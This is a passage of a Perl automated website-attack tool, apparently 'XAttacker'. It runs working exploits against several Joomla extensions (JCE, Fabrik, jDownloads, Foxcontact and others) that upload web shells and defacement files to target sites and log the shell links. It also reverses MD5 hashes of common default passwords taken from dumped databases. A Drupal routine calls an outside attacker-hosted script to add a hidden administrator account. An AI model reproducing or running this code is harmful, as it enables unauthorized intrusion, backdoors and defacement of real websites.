2557 | print color('bold white')," Hash Pass : $hash\n";
2558 | open (TEXT, '>>Result/databases.txt');
2559 | print TEXT "\nHash Pass : $hash";
2560 | close (TEXT);
2561 | lokohash();
2562 | lokopanel();
2563 | }
2564 | }
2565 | }
2566 | }
2567 | sub lokohash(){
2568 | if ($hash =~ /a66abb5684c45962d887564f08346e8d/){
2569 | print color('bold green')," [";
2570 | print color('bold red'),"+";
2571 | print color('bold green'),"] ";
2572 | print color('bold white'),"Cracking Hash : ";
2573 | print color('bold green'),"Found!";
2574 | print color('bold green')," [";
2575 | print color('bold red'),"+";
2576 | print color('bold green'),"]  ";
2577 | print color('bold white'),"Password : admin123456\n";
2578 | open (TEXT, '>>Result/databases.txt');
2579 | print TEXT "\nPassword : admin123456";
2580 | close (TEXT);
2581 | }
2582 | elsif ($hash =~ /0192023a7bbd73250516f069df18b500/){
2583 | print color('bold green')," [";
2584 | print color('bold red'),"+";
2585 | print color('bold green'),"] ";
2586 | print color('bold white'),"Cracking Hash : ";
2587 | print color('bold green'),"Found!";
2588 | print color('bold green')," [";
2589 | print color('bold red'),"+";
2590 | print color('bold green'),"]  ";
2591 | print color('bold white'),"Password : admin123\n";
2592 | open (TEXT, '>>Result/databases.txt');
2593 | print TEXT "\nPassword : admin123";
2594 | close (TEXT);
2595 | }
2596 | elsif ($hash =~ /73acd9a5972130b75066c82595a1fae3/){
2597 | print color('bold green')," [";
2598 | print color('bold red'),"+";
2599 | print color('bold green'),"] ";
2600 | print color('bold white'),"Cracking Hash : ";
2601 | print color('bold green'),"Found!";
2602 | print color('bold green')," [";
2603 | print color('bold red'),"+";
2604 | print color('bold green'),"]  ";
2605 | print color('bold white'),"Password : ADMIN\n";
2606 | open (TEXT, '>>Result/databases.txt');
2607 | print TEXT "\nPassword : ADMIN";
2608 | close (TEXT);
2609 | }
2610 | elsif ($hash =~ /7b7bc2512ee1fedcd76bdc68926d4f7b/){
2611 | print color('bold green')," [";
2612 | print color('bold red'),"+";
2613 | print color('bold green'),"] ";
2614 | print color('bold white'),"Cracking Hash : ";
2615 | print color('bold green'),"Found!";
2616 | print color('bold green')," [";
2617 | print color('bold red'),"+";
2618 | print color('bold green'),"]  ";
2619 | print color('bold white'),"Password : Administrator\n";
2620 | open (TEXT, '>>Result/databases.txt');
2621 | print TEXT "\nPassword : Administrator";
2622 | close (TEXT);
2623 | }
2624 | elsif ($hash =~ /c21f969b5f03d33d43e04f8f136e7682/){
2625 | print color('bold green')," [";
2626 | print color('bold red'),"+";
2627 | print color('bold green'),"] ";
2628 | print color('bold white'),"Cracking Hash : ";
2629 | print color('bold green'),"Found!";
2630 | print color('bold green')," [";
2631 | print color('bold red'),"+";
2632 | print color('bold green'),"]  ";
2633 | print color('bold white'),"Password : default\n";
2634 | open (TEXT, '>>Result/databases.txt');
2635 | print TEXT "\nPassword : default";
2636 | close (TEXT);
2637 | }
2638 | elsif ($hash =~ /1a1dc91c907325c69271ddf0c944bc72/){
2639 | print color('bold green')," [";
2640 | print color('bold red'),"+";
2641 | print color('bold green'),"] ";
2642 | print color('bold white'),"Cracking Hash : ";
2643 | print color('bold green'),"Found!";
2644 | print color('bold green')," [";
2645 | print color('bold red'),"+";
2646 | print color('bold green'),"]  ";
2647 | print color('bold white'),"Password : pass\n";
2648 | open (TEXT, '>>Result/databases.txt');
2649 | print TEXT "\nPassword : pass";
2650 | close (TEXT);
2651 | }
2652 | elsif ($hash =~ /5f4dcc3b5aa765d61d8327deb882cf99/){
2653 | print color('bold green')," [";
2654 | print color('bold red'),"+";
2655 | print color('bold green'),"] ";
2656 | print color('bold white'),"Cracking Hash : ";
2657 | print color('bold green'),"Found!";
2658 | print color('bold green')," [";
2659 | print color('bold red'),"+";
2660 | print color('bold green'),"]  ";
2661 | print color('bold white'),"Password : password\n";
2662 | open (TEXT, '>>Result/databases.txt');
2663 | print TEXT "\nPassword : password";
2664 | close (TEXT);
2665 | }
2666 | elsif ($hash =~ /098f6bcd4621d373cade4e832627b4f6/){
2667 | print color('bold green')," [";
2668 | print color('bold red'),"+";
2669 | print color('bold green'),"] ";
2670 | print color('bold white'),"Cracking Hash : ";
2671 | print color('bold green'),"Found!";
2672 | print color('bold green')," [";
2673 | print color('bold red'),"+";
2674 | print color('bold green'),"]  ";
2675 | print color('bold white'),"Password : test\n";
2676 | open (TEXT, '>>Result/databases.txt');
2677 | print TEXT "\nPassword : test";
2678 | close (TEXT);
2679 | }
2680 | elsif ($hash =~ /21232f297a57a5a743894a0e4a801fc3/){
2681 | print color('bold green')," [";
2682 | print color('bold red'),"+";
2683 | print color('bold green'),"] ";
2684 | print color('bold white'),"Cracking Hash : ";
2685 | print color('bold green'),"Found!";
2686 | print color('bold green')," [";
2687 | print color('bold red'),"+";
2688 | print color('bold green'),"]  ";
2689 | print color('bold white'),"Password : admin\n";
2690 | open (TEXT, '>>Result/databases.txt');
2691 | print TEXT "\nPassword : admin";
2692 | close (TEXT);
2693 | }
2694 | elsif ($hash =~ /fe01ce2a7fbac8fafaed7c982a04e229/){
2695 | print color('bold green')," [";
2696 | print color('bold red'),"+";
2697 | print color('bold green'),"] ";
2698 | print color('bold white'),"Cracking Hash : ";
2699 | print color('bold green'),"Found!\n";
2700 | print color('bold green')," [";
2701 | print color('bold red'),"+";
2702 | print color('bold green'),"]  ";
2703 | print color('bold white'),"Password : demo\n";
2704 | open (TEXT, '>>Result/databases.txt');
2705 | print TEXT "\nPassword : demo";
2706 | close (TEXT);
2707 | }
2708 | else{
2709 | print color('bold green')," [";
2710 | print color('bold red'),"+";
2711 | print color('bold green'),"]  ";
2712 | print color('bold white'),"Password : ";
2713 | print color('bold red'),"NOt FOUND\n";
2714 | }
2715 | }
2716 | 
2717 | sub lokopanel(){
2718 | $ua = LWP::UserAgent->new();
2719 | $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
2720 | $ua->timeout(15);
2721 | $pathone = "$site/redaktur";
2722 | my $lokomediacms = $ua->get("$pathone")->content;
2723 | if($lokomediapathone =~/administrator|username|password/) {
2724 |   print color('bold green')," [";
2725 | print color('bold red'),"+";
2726 | print color('bold green'),"] ";
2727 | print color('bold white'),"Admin Panel : ";
2728 | print color('bold green'),"Found!\n";
2729 | print color('bold green')," [";
2730 | print color('bold red'),"+";
2731 | print color('bold green'),"]  ";
2732 | print color('bold white'),"URL : $pathone\n";
2733 | open (TEXT, '>>Result/databases.txt');
2734 | print TEXT "\nURL : $pathone";
2735 | close (TEXT);
2736 | }
2737 | else{
2738 | print color('bold green')," [";
2739 | print color('bold red'),"+";
2740 | print color('bold green'),"]  ";
2741 | print color('bold white'),"Admin Panel : ";
2742 | print color('bold red'),"NOt FOUND\n";
2743 | }
2744 | }
2745 | 
2746 | ################################################################
2747 | #                                                              #     
2748 | #                            JOOMLA                            # 
2749 | #                                                              #                                                                
2750 | ################################################################
2751 | 
2752 | sub comjce(){
2753 | $ua = LWP::UserAgent->new();
2754 | $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
2755 | $ua->timeout(15);
2756 | 
2757 | 
2758 | my $jceurl="$site/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
2759 | 
2760 | my $res = $ua->post($jceurl,
2761 |     Content_Type => 'form-data',
2762 |     Content => [
2763 |         'upload-dir' => './../../',
2764 |         'upload-overwrite' => 0,
2765 |         'Filedata' => ["XAttacker.gif"],
2766 |         'action' => 'upload'
2767 |         ]
2768 |     )->decoded_content;
2769 | 
2770 | $remote = IO::Socket::INET->new(
2771 |         Proto=>'tcp',
2772 |         PeerAddr=>"$site",
2773 |         PeerPort=>80,
2774 |         Timeout=>15
2775 |         );
2776 | $jceup= "$site/XAttacker.gif";
2777 | $check = $ua->get($jceup)->status_line;
2778 | if ($check =~ /200/){
2779 | print color('bold red'),"[";
2780 | print color('bold green'),"+";
2781 | print color('bold red'),"] ";
2782 | print color('bold white'),"Com Jce";
2783 | print color('bold white')," ........................... ";
2784 | print color('bold green'),"VULN\n";
2785 | print color('bold green')," [";
2786 | print color('bold red'),"+";
2787 | print color('bold green'),"] ";
2788 | print color('bold white'),"Picture Uploaded Successfully\n";
2789 | print color('bold white'),"  [Link] => $jceup\n";
2790 | open (TEXT, '>>Result/index.txt');
2791 | print TEXT "$jceup\n";
2792 | close (TEXT);
2793 | }else{
2794 | print color('bold red'),"[";
2795 | print color('bold green'),"+";
2796 | print color('bold red'),"] ";
2797 | print color('bold white'),"Com Jce";
2798 | print color('bold white')," ........................... ";
2799 | print color('bold red'),"NOt VULN\n";
2800 | }
2801 | }
2802 | 
2803 | 
2804 | ################ Com Media #####################
2805 | sub comedia(){
2806 | my $url = "$site/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=";
2807 | my $index ="XAttacker.txt";
2808 | my $field_name = "Filedata[]";
2809 | 
2810 | my $response = $ua->post( $url,
2811 |             Content_Type => 'form-data',
2812 |             Content => [ $field_name => ["$index"] ]
2813 |            
2814 |             );
2815 | 
2816 | $mediaup="$site/images/XAttacker.txt";
2817 | 
2818 | $checkpofwup = $ua->get("$mediaup")->content;
2819 | if($checkpofwup =~/HaCKeD/) {
2820 | print color('bold red'),"[";
2821 | print color('bold green'),"+";
2822 | print color('bold red'),"] ";
2823 | print color('bold white'),"Com Media";
2824 | print color('bold white')," ......................... ";
2825 | print color('bold green'),"VULN\n";
2826 | print color('bold green')," [";
2827 | print color('bold red'),"+";
2828 | print color('bold green'),"] ";
2829 | print color('bold white'),"File Uploaded Successfully\n";
2830 | print color('bold white'),"  [Link] => $mediaup\n";
2831 | open (TEXT, '>>Result/index.txt');
2832 | print TEXT "$mediaup\n";
2833 | close (TEXT);
2834 | }else{
2835 | print color('bold red'),"[";
2836 | print color('bold green'),"+";
2837 | print color('bold red'),"] ";
2838 | print color('bold white'),"Com Media";
2839 | print color('bold white')," ......................... ";
2840 | print color('bold red'),"NOt VULN\n";
2841 | }
2842 | }
2843 | 
2844 | 
2845 | ################ comjdownloads #####################
2846 | sub comjdownloads(){
2847 | $file="Jattack.rar";
2848 | $filez="XAttacker.php.php.j";
2849 | $jdup= $site . 'index.php?option=com_jdownloads&Itemid=0&view=upload';
2850 | $shellpath= $site . '/images/jdownloads/screenshots/XAttacker.php.j?X=Attacker';
2851 | 
2852 | my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
2853 | $ua->timeout(10);
2854 | $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
2855 | 
2856 | my $exploit = $ua->post("$jdup", Cookie => "", Content_Type => "form-data", Content => [ name=>"Mohamed Riahi", mail=>"moham3driahi@gmail.com", filetitle =>"Mohamed Riahi xD", catlist=>"1", license=>"0", language=>"0", system=>"0",file_upload=>["$file"], pic_upload=>["$filez"], description=>"<p>zot</p>", senden=>"Send file", option=>"com_jdownloads", view=>"upload", send=>"1", "24c22896d6fe6977b731543b3e44c22f"=>"1"]);
2857 | 
2858 | my $checkshell = $ua->get("$shellpath")->content;
2859 | if($checkshell =~/X Attacker/) {
2860 | print color('bold red'),"[";
2861 | print color('bold green'),"+";
2862 | print color('bold red'),"] ";
2863 | print color('bold white'),"Com Jdownloads";
2864 | print color('bold white')," .................... ";
2865 | print color('bold green'),"VULN\n";
2866 | print color('bold green')," [";
2867 | print color('bold red'),"+";
2868 | print color('bold green'),"] ";
2869 | print color('bold white'),"Shell Uploaded Successfully\n";
2870 | print color('bold white'),"  [Link] => $shellpath\n";
2871 | open (TEXT, '>>Result/Shells.txt');
2872 | print TEXT "$shellpath\n";
2873 | close (TEXT);
2874 | }else{
2875 | print color('bold red'),"[";
2876 | print color('bold green'),"+";
2877 | print color('bold red'),"] ";
2878 | print color('bold white'),"Com Jdownloads";
2879 | print color('bold white')," .................... ";
2880 | print color('bold red'),"NOt VULN\n";
2881 | }
2882 | 
2883 | }
2884 | 
2885 | 
2886 | ################ comjdownloads index #####################
2887 | sub comjdownloadsdef(){
2888 | $def = $site . '/images/jdownloads/screenshots/XAttacker.html.j';
2889 | $filee="Jattack.rar";
2890 | $filezz="XAttacker.html.j";
2891 | my $exploitx = $ua->post("$jdup", Cookie => "", Content_Type => "form-data", Content => [ name=>"Mohamed Riahi", mail=>"moham3driahi@gmail.com", filetitle =>"Mohamed Riahi xD", catlist=>"1", license=>"0", language=>"0", system=>"0",file_upload=>["$filee"], pic_upload=>["$filezz"], description=>"<p>zot</p>", senden=>"Send file", option=>"com_jdownloads", view=>"upload", send=>"1", "24c22896d6fe6977b731543b3e44c22f"=>"1"]);
2892 | if ($exploitx->content =~ /The file was successfully transferred to the server/) {
2893 | 
2894 | 
2895 | my $response = $ua->get("$def")->status_line;
2896 | if ($response =~ /200/){
2897 | print color('bold red'),"[";
2898 | print color('bold green'),"+";
2899 | print color('bold red'),"] ";
2900 | print color('bold white'),"Com Jdownloads Index";
2901 | print color('bold white')," .............. ";
2902 | print color('bold green'),"VULN\n";
2903 | print color('bold green')," [";
2904 | print color('bold red'),"+";
2905 | print color('bold green'),"] ";
2906 | print color('bold white'),"Index Uploaded Successfully\n";
2907 | print color('bold white'),"  [Link] => $def\n";
2908 | open (TEXT, '>>Result/index.txt');
2909 | print TEXT "$def\n";
2910 | close (TEXT);
2911 | }else{
2912 | print color('bold red'),"[";
2913 | print color('bold green'),"+";
2914 | print color('bold red'),"] ";
2915 | print color('bold white'),"Com Jdownloads Index";
2916 | print color('bold white')," .............. ";
2917 | print color('bold red'),"NOt VULN\n";
2918 |         }
2919 | }
2920 | else{
2921 | print color('bold red'),"[";
2922 | print color('bold green'),"+";
2923 | print color('bold red'),"] ";
2924 | print color('bold white'),"Com Jdownloads Index";
2925 | print color('bold white')," .............. ";
2926 | print color('bold red'),"NOt VULN\n";
2927 | 
2928 | }
2929 | }
2930 | 
2931 | ################ comfabrik #####################
2932 | sub comfabrik(){
2933 | my $url = "$site/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1";
2934 | my $shell ="XAttacker.php";
2935 | my $field_name = "Filedata";
2936 | 
2937 | my $response = $ua->post( $url,
2938 |             Content_Type => 'form-data',
2939 |             Content => ["userfile" => ["$shell"], "name" => "me.php", "drop_data" => "1", "overwrite" => "1", "field_delimiter" => ",", "text_delimiter" => "&quot;", "option" => "com_fabrik", "controller" => "import", "view" => "import", "task" => "doimport", "Itemid" => "0", "tableid" => "0"]
2940 |            
2941 |             );
2942 | 
2943 | $comfabrikupp="$site/media/XAttacker.php?X=Attacker";
2944 | 
2945 | $checkcomfabrikupp = $ua->get("$comfabrikupp")->content;
2946 | if($checkcomfabrikupp =~/X Attacker/) {
2947 | 
2948 | print color('bold red'),"[";
2949 | print color('bold green'),"+";
2950 | print color('bold red'),"] ";
2951 | print color('bold white'),"Com Fabrik";
2952 | print color('bold white')," ........................ ";
2953 | print color('bold green'),"VULN\n";
2954 | print color('bold green')," [";
2955 | print color('bold red'),"+";
2956 | print color('bold green'),"] ";
2957 | print color('bold white'),"Shell Uploaded Successfully\n";
2958 | print color('bold white'),"  [Link] => $comfabrikupp\n";
2959 | open (TEXT, '>>Result/index.txt');
2960 | print TEXT "$comfabrikupp\n";
2961 | close (TEXT);
2962 | }else{
2963 | print color('bold red'),"[";
2964 | print color('bold green'),"+";
2965 | print color('bold red'),"] ";
2966 | print color('bold white'),"Com Fabrik";
2967 | print color('bold white')," ........................ ";
2968 | print color('bold red'),"NOt VULN\n";
2969 |   comjdownloadsdef();
2970 | }
2971 | }
2972 | 
2973 | ################ comfabrik index #####################
2974 | sub comfabrikdef(){
2975 | my $url = "$site/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1";
2976 | my $index ="XAttacker.txt";
2977 | my $field_name = "Filedata[]";
2978 | 
2979 | my $response = $ua->post( $url,
2980 |             Content_Type => 'form-data',
2981 |             Content => ["userfile" => ["$index"], "name" => "me.php", "drop_data" => "1", "overwrite" => "1", "field_delimiter" => ",", "text_delimiter" => "&quot;", "option" => "com_fabrik", "controller" => "import", "view" => "import", "task" => "doimport", "Itemid" => "0", "tableid" => "0"]
2982 |            
2983 |             );
2984 | 
2985 | $comfabrikup="$site/media/XAttacker.txt";
2986 | 
2987 | $checkcomfabrikup = $ua->get("$comfabrikup")->content;
2988 | if($checkcomfabrikup =~/HaCKeD/) {
2989 | 
2990 | print color('bold red'),"[";
2991 | print color('bold green'),"+";
2992 | print color('bold red'),"] ";
2993 | print color('bold white'),"Com Fabrik Index";
2994 | print color('bold white')," .................. ";
2995 | print color('bold green'),"VULN\n";
2996 | print color('bold green')," [";
2997 | print color('bold red'),"+";
2998 | print color('bold green'),"] ";
2999 | print color('bold white'),"File Uploaded Successfully\n";
3000 | print color('bold white'),"  [Link] => $comfabrikup\n";
3001 | open (TEXT, '>>Result/shells.txt');
3002 | print TEXT "$comfabrikup\n";
3003 | close (TEXT);
3004 | }else{
3005 | print color('bold red'),"[";
3006 | print color('bold green'),"+";
3007 | print color('bold red'),"] ";
3008 | print color('bold white'),"Com Fabrik Index";
3009 | print color('bold white')," .................. ";
3010 | print color('bold red'),"NOt VULN\n";
3011 | }
3012 | }
3013 | 
3014 | ################ foxcontact #####################
3015 | sub foxcontact(){
3016 | 
3017 | @foxvuln= ("components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php",
3018 | "index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php",
3019 | "index.php?option=com_foxcontact&amp;view=loader&amp;type=uploader&amp;owner=module&amp;id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php",
3020 | "components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php");
3021 | OUTER: foreach $foxvuln(@foxvuln){
3022 | chomp $foxvuln;
3023 | 
3024 | my $url = "$site/$foxvuln";
3025 | 
3026 | my $shell ="XAttacker.php";
3027 | 
3028 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ ["$shell"] ]);
3029 | 
3030 | $foxup="$site/components/com_foxcontact/_func.php?X=Attacker";
3031 | }
3032 | my $checkfoxup = $ua->get("$foxup")->content;
3033 | if ($checkfoxup =~ /X Attacker/) {
3034 | print color('bold red'),"[";
3035 | print color('bold green'),"+";
3036 | print color('bold red'),"] ";
3037 | print color('bold white'),"Com Foxcontact";
3038 | print color('bold white')," .................... ";
3039 | print color('bold green'),"VULN\n";
3040 | print color('bold green')," [";
3041 | print color('bold red'),"+";
3042 | print color('bold green'),"] ";
3043 | print color('bold white'),"Shell Uploaded Successfully\n";
3044 | print color('bold white'),"  [Link] => $foxup\n";
3045 | open (TEXT, '>>Result/shells.txt');
3046 | print TEXT "$foxup\n";
3047 | close (TEXT);
3048 | }else{
3049 | print color('bold red'),"[";
3050 | print color('bold green'),"+";
3051 | print color('bold red'),"] ";
3052 | print color('bold white'),"Com Foxcontact";
3053 | print color('bold white')," .................... ";
3054 | print color('bold red'),"NOt VULN\n";
3055 | }
3056 | }
3057 | 
3058 | 
3059 | ################ comadsmanager #####################
3060 | sub comadsmanager(){
3061 | my $url = "$site/index.php?option=com_adsmanager&task=upload&tmpl=component";
3062 | 
3063 | my $response = $ua->post( $url,
3064 |             Cookie => "", Content_Type => "form-data", Content => [file => ["XAttacker.jpg"], name => "XAttacker.html"]
3065 |            
3066 |             );
3067 | 
3068 | $comadsmanagerup="$site/tmp/plupload/XAttacker.html";
3069 | 
3070 | $checkcomadsmanagerup = $ua->get("$comadsmanagerup")->content;
3071 | if($checkcomadsmanagerup =~/HaCKeD/) {
3072 | print color('bold red'),"[";
3073 | print color('bold green'),"+";
3074 | print color('bold red'),"] ";
3075 | print color('bold white'),"Com Ads Manager";
3076 | print color('bold white')," ................... ";
3077 | print color('bold green'),"VULN\n";
3078 | print color('bold green')," [";
3079 | print color('bold red'),"+";
3080 | print color('bold green'),"] ";
3081 | print color('bold white'),"File Uploaded Successfully\n";
3082 | print color('bold white'),"  [Link] => $comadsmanagerup\n";
3083 | open (TEXT, '>>Result/index.txt');
3084 | print TEXT "$comadsmanagerup\n";
3085 | close (TEXT);
3086 | }else{
3087 | print color('bold red'),"[";
3088 | print color('bold green'),"+";
3089 | print color('bold red'),"] ";
3090 | print color('bold white'),"Com Ads Manager";
3091 | print color('bold white')," ................... ";
3092 | print color('bold red'),"NOt VULN\n";
3093 | }
3094 | }
3095 | 
3096 | sub comblog(){
3097 | 
3098 | my $url = "$site/index.php?option=com_myblog&task=ajaxupload";
3099 | my $checkblog = $ua->get("$url")->content;
3100 | if($checkblog =~/has been uploaded/) {
3101 | print color('bold red'),"[";
3102 | print color('bold green'),"+";
3103 | print color('bold red'),"] ";
3104 | print color('bold white'),"Com Blog";
3105 | print color('bold white')," .......................... ";
3106 | print color('bold green'),"VULN\n";
3107 | print color('bold green')," [";
3108 | print color('bold red'),"+";
3109 | print color('bold green'),"] ";
3110 | print color('bold white'),"Exploit It It Manual\n";
3111 |     open(save, '>>Result/vulntargets.txt');   
3112 |     print save "[blog] $site\n";   
3113 |     close(save);
3114 | }else{
3115 | print color('bold red'),"[";
3116 | print color('bold green'),"+";
3117 | print color('bold red'),"] ";
3118 | print color('bold white'),"Com Blog";
3119 | print color('bold white')," .......................... ";
3120 | print color('bold red'),"NOt VULN\n";
3121 | }
3122 | }
3123 | 
3124 | 
3125 | sub comusers(){
3126 | 
3127 | my $url = "$site/index.php?option=com_users&view=registration";
3128 | my $checkomusers = $ua->get("$url")->content;
3129 | if($checkomusers =~/jform_email2-lbl/) {
3130 | print color('bold red'),"[";
3131 | print color('bold green'),"+";
3132 | print color('bold red'),"] ";
3133 | print color('bold white'),"Com Users";
3134 | print color('bold white')," ......................... ";
3135 | print color('bold green'),"VULN\n";
3136 | print color('bold green')," [";
3137 | print color('bold red'),"+";
3138 | print color('bold green'),"] ";
3139 | print color('bold white'),"Exploit It It Manual\n";
3140 |     open(save, '>>Result/vulntargets.txt');   
3141 |     print save "[Com Users] $site\n";   
3142 |     close(save);
3143 | }else{
3144 | print color('bold red'),"[";
3145 | print color('bold green'),"+";
3146 | print color('bold red'),"] ";
3147 | print color('bold white'),"Com Users";
3148 | print color('bold white')," ......................... ";
3149 | print color('bold red'),"NOt VULN\n";
3150 |     }
3151 | }
3152 | 
3153 | 
3154 | ################ comweblinks #####################
3155 | sub comweblinks(){
3156 |     $ua = LWP::UserAgent->new(keep_alive => 1);
3157 | $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
3158 | $ua->timeout (30);
3159 | $ua->cookie_jar(
3160 |         HTTP::Cookies->new(
3161 |             file => 'mycookies.txt',
3162 |             autosave => 1
3163 |         )
3164 |     );
3165 | $urlone ="$site/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=";
3166 | $token = $ua->get($urlone)->content;
3167 | if($token =~/<form action="(.*?)" id="uploadForm"/)
3168 | {
3169 | $url=$1;
3170 | }
3171 | 
3172 | my $index ="XAttacker.gif";
3173 | my $field_name = "Filedata[]";
3174 | 
3175 | my $response = $ua->post( $url,
3176 |             Content_Type => 'form-data',
3177 |             Content => [ $field_name => ["$index"] ]
3178 |            
3179 |             );
3180 | 
3181 | $weblinksup= "$site/images/XAttacker.gif";
3182 | $check = $ua->get($weblinksup)->status_line;
3183 | if ($check =~ /200/){
3184 | print color('bold red'),"[";
3185 | print color('bold green'),"+";
3186 | print color('bold red'),"] ";
3187 | print color('bold white'),"Com Weblinks";
3188 | print color('bold white')," ...................... ";
3189 | print color('bold green'),"VULN\n";
3190 | print color('bold green')," [";
3191 | print color('bold red'),"+";
3192 | print color('bold green'),"] ";
3193 | print color('bold white'),"Picture Uploaded Successfully\n";
3194 | print color('bold white'),"  [Link] => $weblinksup\n";
3195 | open (TEXT, '>>Result/index.txt');
3196 | print TEXT "$weblinksup\n";
3197 | close (TEXT);
3198 | }else{
3199 | print color('bold red'),"[";
3200 | print color('bold green'),"+";
3201 | print color('bold red'),"] ";
3202 | print color('bold white'),"Com Weblinks";
3203 | print color('bold white')," ...................... ";
3204 | print color('bold red'),"NOt VULN\n";
3205 | }
3206 | }
3207 | 
3208 | ################ mod_simplefileupload #####################
3209 | sub mod_simplefileupload(){
3210 |     $ua = LWP::UserAgent->new(keep_alive => 1);
3211 | $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
3212 | $ua->timeout (30);
3213 | 
3214 | $url ="$site/modules/mod_simplefileuploadv1.3/elements/udd.php";
3215 | $simplefileuploadsup= "$site/modules/mod_simplefileuploadv1.3/elements/XAttacker.php?X=Attacker";
3216 | 
3217 | my $shell ="XAttacker.php";
3218 | 
3219 | my $response = $ua->post( $url, Content_Type => "multipart/form-data", Content => [ file=>["$shell"] , submit=>"Upload" ]);
3220 | 
3221 | $check = $ua->get($simplefileuploadsup)->content;
3222 | if ($check =~ /X Attacker/){
3223 | print color('bold red'),"[";
3224 | print color('bold green'),"+";
3225 | print color('bold red'),"] ";
3226 | print color('bold white'),"mod_simplefileupload";
3227 | print color('bold white')," .............. ";
3228 | print color('bold green'),"VULN\n";
3229 | print color('bold green')," [";
3230 | print color('bold red'),"+";
3231 | print color('bold green'),"] ";
3232 | print color('bold white'),"Shell Uploaded Successfully\n";
3233 | print color('bold white'),"  [Link] => $simplefileuploadsup\n";
3234 | open (TEXT, '>>Result/shells.txt');
3235 | print TEXT "$simplefileuploadsup\n";
3236 | close (TEXT);
3237 | }else{
3238 | print color('bold red'),"[";
3239 | print color('bold green'),"+";
3240 | print color('bold red'),"] ";
3241 | print color('bold white'),"mod_simplefileupload";
3242 | print color('bold white')," .............. ";
3243 | print color('bold red'),"NOt VULN\n";
3244 | }
3245 | }
3246 | ##########################################################
3247 | #drupal exploit coded by fallaeg gassrini xD thnx gass <3#
3248 | ##########################################################
3249 | sub drupal(){
3250 | $ua = LWP::UserAgent->new(keep_alive => 1);
3251 | $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
3252 | $ua->timeout (20);
3253 | 
3254 | # check the link of the exploit or you can download script from here : http://pastebin.com/wPAbtyJ4 and you upload it on you one shell :) 
3255 | $drupalink = "http://oriflame-angela.ru/gassrini.php";
3256 | my $exploit = "$drupalink?url=$site&submit=submit";
3257 | $admin ="XAttacker";
3258 | $pass  ="XAttacker";
3259 | $dr = $site . '/user/login';
3260 | $red = $site . '/user/1';
3261 | my $checkk = $ua->get("$exploit")->content;
3262 | if($checkk =~/Success!/) {
3263 | print color('bold red'),"[";
3264 | print color('bold green'),"+";
3265 | print color('bold red'),"] ";
3266 | print color('bold white'),"Drupal Add Admin";
3267 | print color('bold white')," ................... ";
3268 | print color('bold green'),"VULN\n";
3269 | print color('bold green')," [";
3270 | print color('bold red'),"+";
3271 | print color('bold green'),"] ";
3272 | print color('bold white'),"URL : $dr\n";
3273 | print color('bold white'),"USER : $admin\n";
3274 | print color('bold white'),"PASS : $pass\n";
3275 | open (TEXT, '>>Result/drupal.txt');
3276 | print TEXT "\nURL : $dr\n";
3277 | print TEXT "USER : $admin\n";
3278 | print TEXT "PASS : $pass\n";
3279 | close (TEXT);
3280 | }else{
3281 | print color('bold red'),"[";
3282 | print color('bold green'),"+";
3283 | print color('bold red'),"] ";
3284 | print color('bold white'),"Drupal Add Admin";
3285 | print color('bold white')," ................... ";
3286 | print color('bold red'),"NOt VULN\n";
3287 | }
3288 | }
3289 | 


--------------------------------------------------------------------------------